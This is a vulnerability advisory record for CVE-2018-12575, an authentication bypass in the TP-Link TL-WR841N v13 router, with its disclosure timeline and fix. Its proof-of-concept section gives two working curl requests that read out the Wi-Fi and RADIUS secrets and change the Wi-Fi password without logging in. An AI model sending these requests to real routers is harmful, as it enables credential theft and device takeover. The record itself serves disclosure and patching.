ID

VAR-E-201806-0363


CVE

cve_id:CVE-2018-12575

Trust: 0.5

sources: PACKETSTORM: 148351

TITLE

TP-Link TL-WR841N V13 Insecure Direct Object Reference

Trust: 0.5

sources: PACKETSTORM: 148351

DESCRIPTION

TP-Link TL-WR841N v13 suffers from an authentication bypass vulnerability via an insecure direct object reference vulnerability.

Trust: 0.5

sources: PACKETSTORM: 148351

AFFECTED PRODUCTS

vendor:tp linkmodel:tl-wr841nscope:eqversion:v13

Trust: 0.5

sources: PACKETSTORM: 148351

EXPLOIT

* Vulnerability: Broken Authentication
* Affected Software: TP-Link TL-WR841N v13
* Affected Version: 0.9.1 4.16 v0001.0 Build 171019 Rel.55346n
* Patched Version: 0.9.1 4.16 v0001.0 Build 180119 Rel.65243n
* Risk: High
* Vendor Contacted: 05/20/2018
* Vendor Fix: Issue was independently fixed in previous version
* Public Disclosure: 06/27/2018

##### Overview

An attacker that can send HTTP requests to the router can bypass the
authentication mechanism of the web interface and thus perform arbitrary
actions.

##### CVSS

High 8.8 CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

##### Details

An unauthenticated attacker can send arbitrary requests to CGI scripts,
which allows them to perform all actions an authenticated user could
perform, as well as read out all information that an authenticated user
can read out. With default configuration, the attacker has to be in the
same local network as the router.

The issue exists because while the frontend of the web interface has a
basic authentication mechanism, requests to the CGI scripts fail to
validate the authentication cookie.

##### POC

Read out Wifi password:

curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'Referer:
http://192.168.0.1/' -H $'Content-Type: text/plain' -H $'Content-Length:
404' -H $'Connection: close' --data-binary
$'[LAN_WLAN#0,0,0,0,0,0#0,0,0,0,0,0]0,19\x0d\x0aname\x0d\x0aSSID\x0d\x0aEnable\x0d\x0aX_TP_Configuration_Modified\x0d\x0abeaconType\x0d\x0aStandard\x0d\x0aWEPEncryptionLevel\x0d\x0aWEPKeyIndex\x0d\x0aBasicEncryptionModes\x0d\x0aBasicAuthenticationMode\x0d\x0aWPAEncryptionModes\x0d\x0aWPAAuthenticationMode\x0d\x0aIEEE11iEncryptionModes\x0d\x0aIEEE11iAuthenticationMode\x0d\x0aX_TP_PreSharedKey\x0d\x0aX_TP_GroupKeyUpdateInterval\x0d\x0aX_TP_RadiusServerIP\x0d\x0aX_TP_RadiusServerPort\x0d\x0aX_TP_RadiusServerPassword\x0d\x0a'
$'http://192.168.0.1/cgi?5'

Change Wifi password:

curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'Referer:
http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 197' -H
$'Connection: close' --data-binary
$'[LAN_WLAN#1,1,0,0,0,0#0,0,0,0,0,0]0,5\x0d\x0aBeaconType=11i\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=AESEncryption\x0d\x0aX_TP_PreSharedKey=12345678\x0d\x0aX_TP_GroupKeyUpdateInterval=0\x0d\x0a'
$'http://192.168.0.1/cgi?2'

##### Solution

The issue was already fixed independently of this report in the newest
version of the firmware:

TL-WR841N(EU)_V13_180119:
https://www.tp-link.com/uk/download/TL-WR841N.html#Firmware

--
PGP Key: https://pgp.mit.edu/pks/lookup?op=get&search=0xFD8E2B9091A24C75

Trust: 0.5

sources: PACKETSTORM: 148351

EXPLOIT HASH

LOCAL

SOURCE

md5: 37834a9f73c3857930c4f53e9735344e
sha-1: d0e8f099cf4d07c53b7ef9e52cd0adb49fe3824a
sha-256: 9995c6b3b6cf275d4bde83f805fb4d5553b3807472d1967cf7e57c4f243ec759
md5: 37834a9f73c3857930c4f53e9735344e

Trust: 0.5

sources: PACKETSTORM: 148351

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 148351

TYPE

bypass

Trust: 0.5

sources: PACKETSTORM: 148351

TAGS

tag:exploit

Trust: 0.5

tag:bypass

Trust: 0.5

sources: PACKETSTORM: 148351

CREDITS

Tim Coen

Trust: 0.5

sources: PACKETSTORM: 148351

EXTERNAL IDS

db:NVDid:CVE-2018-12575

Trust: 0.5

db:PACKETSTORMid:148351

Trust: 0.5

sources: PACKETSTORM: 148351

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2018-12575

Trust: 0.5

sources: PACKETSTORM: 148351

SOURCES

db:PACKETSTORMid:148351

LAST UPDATE DATE

2022-07-27T09:37:26.541000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:148351date:2018-06-28T23:59:28